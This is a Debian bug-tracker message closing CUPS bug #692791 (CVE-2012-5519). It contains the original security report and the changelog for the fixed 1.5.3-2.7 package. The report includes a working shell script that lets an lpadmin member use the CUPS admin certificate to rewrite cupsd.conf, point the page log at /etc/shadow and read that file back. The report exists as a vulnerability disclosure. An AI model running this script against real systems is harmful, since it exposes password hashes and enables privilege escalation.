Bug#692791: marked as done (members of lpadmin can read every file on server via cups)

[Debian Bug Tracking System]

Your message dated Tue, 04 Dec 2012 12:17:52 +0000
with message-id <e1tfrrg-00005h...@franck.debian.org>
and subject line Bug#692791: fixed in cups 1.5.3-2.7
has caused the Debian Bug report #692791,
regarding members of lpadmin can read every file on server via cups
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
692791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole

Members of lpadmin cat read /var/run/cups/certs/0. With this key it is possible 
to access the cups web interface as admin. You can edit the cups config file 
and set the page log to any filename you want (for example /etc/shadow). Then 
you can read the file contents by viewing the cups page log. By printing you 
can also write some random data to the given file.

As it is not possible to use the cups authentication with a normal webbrowser I 
created a simple shell script to show the effect. When called as any 
unprivileged user which is member of lpadmin it should display the contents of 
/etc/shadow:


#!/bin/sh
set -e

# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp

AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"

POST -d -H "$AUTH" -H "Cookie: org.cups.sid="
http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF

GET http://localhost:631/admin/log/page_log


This bug was detected by one of our customers, Jann Horn.

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages cups depends on:
ii  adduser             3.112+nmu2           add and remove users and groups
ii  bc                  1.06.95-2            The GNU bc arbitrary precision cal
ii  cups-client         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-common         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-ppdc           1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  debconf [debconf-2. 1.5.36.1             Debian configuration management sy
ii  ghostscript         8.71~dfsg2-9         The GPL Ghostscript PostScript/PDF
ii  libavahi-client3    0.6.27-2+squeeze1    Avahi client library
ii  libavahi-common3    0.6.27-2+squeeze1    Avahi common library
ii  libc6               2.11.3-4             Embedded GNU C Library: Shared lib
ii  libcups2            1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupscgi1         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsdriver1      1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsimage2       1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsmime1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsppdc1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libdbus-1-3         1.2.24-4+squeeze1    simple interprocess messaging syst
ii  libgcc1             1:4.4.5-8            GCC support library
ii  libgnutls26         2.8.6-1+squeeze2     the GNU TLS library - runtime libr
ii  libgssapi-krb5-2    1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii  libijs-0.35         0.35-7               IJS raster image transport protoco
ii  libkrb5-3           1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii  libldap-2.4-2       2.4.23-7.2           OpenLDAP libraries
ii  libpam0g            1.1.1-6.1+squeeze1   Pluggable Authentication Modules l
ii  libpaper1           1.1.24               library for handling paper charact
ii  libpoppler5         0.12.4-1.2           PDF rendering library
ii  libslp1             1.2.1-7.8            OpenSLP libraries
ii  libstdc++6          4.4.5-8              The GNU Standard C++ Library v3
ii  libusb-0.1-4        2:0.1.12-16          userspace USB programming library
ii  lsb-base            3.2-23.2squeeze1     Linux Standard Base 3.2 init scrip
ii  poppler-utils       0.12.4-1.2           PDF utilitites (based on libpopple
ii  procps              1:3.2.8-9squeeze1    /proc file system utilities
ii  ssl-cert            1.0.28               simple debconf wrapper for OpenSSL
ii  ttf-freefont        20090104-7           Freefont Serif, Sans and Mono True
ii  zlib1g              1:1.2.3.4.dfsg-3     compression library - runtime

Versions of packages cups recommends:
ii  cups-driver-gutenprint  5.2.6-1          printer drivers for CUPS
ii  foomatic-filters        4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii  ghostscript-cups        8.71~dfsg2-9     The GPL Ghostscript PostScript/PDF

Versions of packages cups suggests:
ii  cups-bsd               1.4.4-7+squeeze1  Common UNIX Printing System(tm) - 
pn  cups-pdf               <none>            (no description available)
ii  foomatic-db            20100630-1        OpenPrinting printer support - dat
pn  hplip                  <none>            (no description available)
ii  smbclient              2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for 
ii  udev                   164-3             /dev/ and hotplug management daemo
pn  xpdf-korean | xpdf-jap <none>            (no description available)

-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]

-- debconf information excluded

--- End Message ---

--- Begin Message ---

Source: cups
Source-Version: 1.5.3-2.7

We believe that the bug you reported is fixed in the latest version of
cups, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 692...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Didier Raboud <o...@debian.org> (supplier of updated cups package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 04 Dec 2012 12:13:14 +0100
Source: cups
Binary: libcups2 libcupsimage2 libcupscgi1 libcupsdriver1 libcupsmime1 
libcupsppdc1 cups cups-client libcups2-dev libcupsimage2-dev libcupscgi1-dev 
libcupsdriver1-dev libcupsmime1-dev libcupsppdc1-dev cups-bsd cups-common 
cups-ppdc cups-dbg cupsddk
Architecture: source all amd64
Version: 1.5.3-2.7
Distribution: unstable
Urgency: low
Maintainer: Debian Printing Team <debian-print...@lists.debian.org>
Changed-By: Didier Raboud <o...@debian.org>
Description: 
 cups       - Common UNIX Printing System(tm) - server
 cups-bsd   - Common UNIX Printing System(tm) - BSD commands
 cups-client - Common UNIX Printing System(tm) - client programs (SysV)
 cups-common - Common UNIX Printing System(tm) - common files
 cups-dbg   - Common UNIX Printing System(tm) - debugging symbols
 cups-ppdc  - Common UNIX Printing System(tm) - PPD manipulation utilities
 cupsddk    - Common UNIX Printing System (transitional package)
 libcups2   - Common UNIX Printing System(tm) - Core library
 libcups2-dev - Common UNIX Printing System(tm) - Development files CUPS library
 libcupscgi1 - Common UNIX Printing System(tm) - CGI library
 libcupscgi1-dev - Common UNIX Printing System(tm) - Development files for CGI 
libra
 libcupsdriver1 - Common UNIX Printing System(tm) - Driver library
 libcupsdriver1-dev - Common UNIX Printing System(tm) - Development files 
driver librar
 libcupsimage2 - Common UNIX Printing System(tm) - Raster image library
 libcupsimage2-dev - Common UNIX Printing System(tm) - Development files CUPS 
image li
 libcupsmime1 - Common UNIX Printing System(tm) - MIME library
 libcupsmime1-dev - Common UNIX Printing System(tm) - Development files MIME 
library
 libcupsppdc1 - Common UNIX Printing System(tm) - PPD manipulation library
 libcupsppdc1-dev - Common UNIX Printing System(tm) - Development files PPD 
library
Closes: 692791
Changes: 
 cups (1.5.3-2.7) unstable; urgency=low
 .
   * Backport upstream configuration files split to address CVE-2012-5519.
     - Add split-configuration-files-STR4223.patch
     - Refresh affected patches:
      - cups-deviced-allow-device-ids-with-newline.patch
      - default_log_settings.patch
      - pidfile.patch
      - reactivate_recommended_driver.patch
      - removecvstag.patch
      - tests-ignore-usb-crash.patch
     - Install the new cups-files.conf
     Fixes: CVE-2012-5519 (Closes: #692791)
   * Make cupsd.conf a non-conffile, as it is managed by cups itself.
     - On new installs, set it up from cupsd.conf.default.
     - On upgrades, move it away in preinst and move it back in postinst.
     - On aborted upgrades, move the file back in place.
   * Document the split in cups.NEWS.
   * Update translations for new manpage, install it.
   * Put under Debian Printing Team umbrella.
Checksums-Sha1: 
 26eb4f3ecd3365337baa319e333ef3feac3df312 3256 cups_1.5.3-2.7.dsc
 1c2f9e3b0dc74bf25a2cd1f0b171b614dada6418 368307 cups_1.5.3-2.7.debian.tar.gz
 2e1a754bcc9ed101cc5fb525c3a23e53d2dfc5e4 902018 cups-common_1.5.3-2.7_all.deb
 a0c4e366c519379f3d03f782278146a768313c58 85590 cupsddk_1.5.3-2.7_all.deb
 0f59305679c60a0eab75fd6ede0873a1cbdf9a71 254474 libcups2_1.5.3-2.7_amd64.deb
 70083237058a5f5c3f3c3819d5096dfb790bbffe 136482 
libcupsimage2_1.5.3-2.7_amd64.deb
 89917085799675485d72777ca0640e86a3d7bd18 114974 libcupscgi1_1.5.3-2.7_amd64.deb
 89891d78666ddf2cd0524f0ae953c6549c926963 103018 
libcupsdriver1_1.5.3-2.7_amd64.deb
 6aa43ff47c4e7378dfed7558f0a350c3bc9608f7 97916 libcupsmime1_1.5.3-2.7_amd64.deb
 2e4ef2afcdcb52d6a99b8c4f0053efebd4a7f7fb 137966 
libcupsppdc1_1.5.3-2.7_amd64.deb
 63af729ab756749f7b93168bcbf5de09c2c263e9 1383924 cups_1.5.3-2.7_amd64.deb
 f21c28ea0e0b882bfc81b1d6a5fb00adcdc420d8 180228 cups-client_1.5.3-2.7_amd64.deb
 2b8d0e685862449e2715bf988fdb4ebeb1935da0 326202 
libcups2-dev_1.5.3-2.7_amd64.deb
 5f08f140e99aca2c236c7689ac87d1aa8b28cf4d 65314 
libcupsimage2-dev_1.5.3-2.7_amd64.deb
 e7fb2214027296208ed3d6fc256f7c064bfe1387 120750 
libcupscgi1-dev_1.5.3-2.7_amd64.deb
 5e7fed37c52cc7e00d8a5524ce67d3d1da48a218 105970 
libcupsdriver1-dev_1.5.3-2.7_amd64.deb
 905a97e5ab04822031a7287c3aca60f22bd499c5 98740 
libcupsmime1-dev_1.5.3-2.7_amd64.deb
 d7753f35bb5a33030be709e70842712c95f78dfc 155210 
libcupsppdc1-dev_1.5.3-2.7_amd64.deb
 6c7c005e9c85f64e52532146aa8d9a1e4c18857f 45606 cups-bsd_1.5.3-2.7_amd64.deb
 241a5d52cdad9bf382fa67bf1102e8c2122885a2 115328 cups-ppdc_1.5.3-2.7_amd64.deb
 3b83c365534c4250f6c6dcd3f89ae2d4cffacb60 2212234 cups-dbg_1.5.3-2.7_amd64.deb
Checksums-Sha256: 
 aba2349053142997393e0ce2a1a2facd6982558d9b44cb11de9f124bf8d64787 3256 
cups_1.5.3-2.7.dsc
 c1647f43fab5207c85fb6e9c2c00e836242e125b6a2ab4b765e8b30458c4d6fc 368307 
cups_1.5.3-2.7.debian.tar.gz
 e78b900288274c1e14d4fe9d5882f295db38226aa0b72e727e2dbfd76cd5b2c2 902018 
cups-common_1.5.3-2.7_all.deb
 e120c71043772a875af8f9b7afd36901af90679137ec95e50beb8f3d8568c128 85590 
cupsddk_1.5.3-2.7_all.deb
 80b5990ad290bf3f1204b62e5a879d6018605985c03ba46e4f42ac889fcdffed 254474 
libcups2_1.5.3-2.7_amd64.deb
 f42112e9d240e379b45a9012e646888f31f3c297e2fed3231be52c5cbfbfec72 136482 
libcupsimage2_1.5.3-2.7_amd64.deb
 2cc762f7183801581fdf09cb1e8912b0f647fc6aba1915a21914651152251755 114974 
libcupscgi1_1.5.3-2.7_amd64.deb
 31cedf183787f63209ea75189f30e3afa8d91a8a88f36ef6ea4fcf9d6bd02acb 103018 
libcupsdriver1_1.5.3-2.7_amd64.deb
 51fdf601842f2474fc3812af4d07e1d520a78201b62d48e9e840dd60f808c798 97916 
libcupsmime1_1.5.3-2.7_amd64.deb
 95f7690cb39696eccb285c8356dd8347562cccbba7358482131e3b03676742f9 137966 
libcupsppdc1_1.5.3-2.7_amd64.deb
 a93317a3074e96b87984c3772395bf6d6a0211b6ab1f03a782abdc2a1aa06ee1 1383924 
cups_1.5.3-2.7_amd64.deb
 bf8989ebccdddd2208b39c43bba071f76e4c517e4d9f0d94c5eb9d4fd831472b 180228 
cups-client_1.5.3-2.7_amd64.deb
 05efa4aaa2230bead36e331ab28c46dda9725e1cb398e7f552d18288b432e825 326202 
libcups2-dev_1.5.3-2.7_amd64.deb
 bd06db39f63bb243327509da120d3848072ebec2f887721c6f7614abbadd84ff 65314 
libcupsimage2-dev_1.5.3-2.7_amd64.deb
 69b54a25753209fcb9241cf433b68dc944fd8e672f242516cc7f085bde5ee257 120750 
libcupscgi1-dev_1.5.3-2.7_amd64.deb
 32efa40e7f146ff981633e2f08be64c62a9c364c3075be13113a48e93e8074f6 105970 
libcupsdriver1-dev_1.5.3-2.7_amd64.deb
 36e262cb5ab072c8c3a54418e43a27e6a65f05b6c1a5e3432dfea36dfe1830cf 98740 
libcupsmime1-dev_1.5.3-2.7_amd64.deb
 145890d5986bf0e61dbe6771e1cfd8e0c4c79399dd2d743acc13e39f6c60499a 155210 
libcupsppdc1-dev_1.5.3-2.7_amd64.deb
 6f7c350725ce9011e39cc2a5e4b4e47c7153fffddada61331d1ef8e519bca82f 45606 
cups-bsd_1.5.3-2.7_amd64.deb
 240a8f2843c1973dcc8ea47c06fc6d3d3c4f3551172a5d08af8e507e9949e2a7 115328 
cups-ppdc_1.5.3-2.7_amd64.deb
 3a59c3298991bccab1edd8ae3a88bab2f64fb8e4257b6d2a6fd6a0dc835399d7 2212234 
cups-dbg_1.5.3-2.7_amd64.deb
Files: 
 2abe7f2c89535bc5f9a10d09bbaa452c 3256 net optional cups_1.5.3-2.7.dsc
 2c4bcd2cd5f01d1864a1ae49237b1315 368307 net optional 
cups_1.5.3-2.7.debian.tar.gz
 3c3809251fe1276e4f39d9ede615ce87 902018 net optional 
cups-common_1.5.3-2.7_all.deb
 4d849b912caac8fc049530556a4f13fe 85590 oldlibs extra cupsddk_1.5.3-2.7_all.deb
 03b39656f5cd8c770cd98904661b6b27 254474 libs optional 
libcups2_1.5.3-2.7_amd64.deb
 890405a4932940e0c1ed592bf94ae4c8 136482 libs optional 
libcupsimage2_1.5.3-2.7_amd64.deb
 ccb6e4c4ef0cce170eb4d9c31843c305 114974 libs optional 
libcupscgi1_1.5.3-2.7_amd64.deb
 bb4896865f95e4c3469c1841ddf6fe3a 103018 libs optional 
libcupsdriver1_1.5.3-2.7_amd64.deb
 487c6fd285e00bade24a491d1b449b21 97916 libs optional 
libcupsmime1_1.5.3-2.7_amd64.deb
 700f99c7f0c7e9fa780317d63d48acbb 137966 libs optional 
libcupsppdc1_1.5.3-2.7_amd64.deb
 edde59a4f56e4b1748af78ddd3339459 1383924 net optional cups_1.5.3-2.7_amd64.deb
 f32cacf1845c0027615ce96242900551 180228 net optional 
cups-client_1.5.3-2.7_amd64.deb
 c3c68bac531f3587c272f1415017604b 326202 libdevel optional 
libcups2-dev_1.5.3-2.7_amd64.deb
 ce0ab4c99f00891f1fe8dd4b1b013d82 65314 libdevel optional 
libcupsimage2-dev_1.5.3-2.7_amd64.deb
 a0943249aa687916d72fe7066f8cee4b 120750 libdevel optional 
libcupscgi1-dev_1.5.3-2.7_amd64.deb
 7306e888d603f59fa88de49853207f1c 105970 libdevel optional 
libcupsdriver1-dev_1.5.3-2.7_amd64.deb
 3d1c185a1863b12b1aec71510860a15d 98740 libdevel optional 
libcupsmime1-dev_1.5.3-2.7_amd64.deb
 9f3d4ad6c67e5fe70c9a15227f5125eb 155210 libdevel optional 
libcupsppdc1-dev_1.5.3-2.7_amd64.deb
 e1dca0a163ee63b5d706f6bbad3fce11 45606 net extra cups-bsd_1.5.3-2.7_amd64.deb
 8eff7344c5aeb0669094839fb8cb69ec 115328 utils optional 
cups-ppdc_1.5.3-2.7_amd64.deb
 75db84ec75c3860a49893deff9c37542 2212234 debug extra 
cups-dbg_1.5.3-2.7_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQGcBAEBCAAGBQJQveZuAAoJEIvPpx7KFjRV/E8L+gLyWjTrMYlW7cT48jtWW8bY
KddY6NObhxLL2jQL6jmAIF4w7QLONYk1bretCoxw7EaHTs6TkkIYqF6J52aMKqEy
AdOGlSE/obeyPBOL/h75QsOeN4rUdbPtZk47sbTV2CW2kcT9S5Qyz/Y9I3k6zWqf
6Kn+93SFEMzQ1oQEzMebuNf3dDGCfIAGa6kUesyxd9c7N26d7n1eqvEyMidiobCB
6O1lsRV6iOMgsC3Pk45AO7kLvBEFO5f8h8TTU5xLaI03iFIz0cwAqFKwcA6GBHdH
1hclcjj6eFaP37AHItqnvdSN5nvf1CdqIDlrNfVo3WFLnoOagfWHgN/LMQOQmBO4
9YKO9EMFhop4GbkF95NMJb5QXu5Bt9NVjYe3zhSdV4aSxV8RTZ/xEJPJjE+t9Uzj
zMWHkVeQfSXzcfFMk2ckcpr2T/hKiLSZvkZpXE7/XtlgMz37a0S7qoy8oGODtgEC
BTYzzu/YzwfA9JQ1voxd4JzIuhrNTzU8gwuJ+g4Mtg==
=wtIc
-----END PGP SIGNATURE-----

--- End Message ---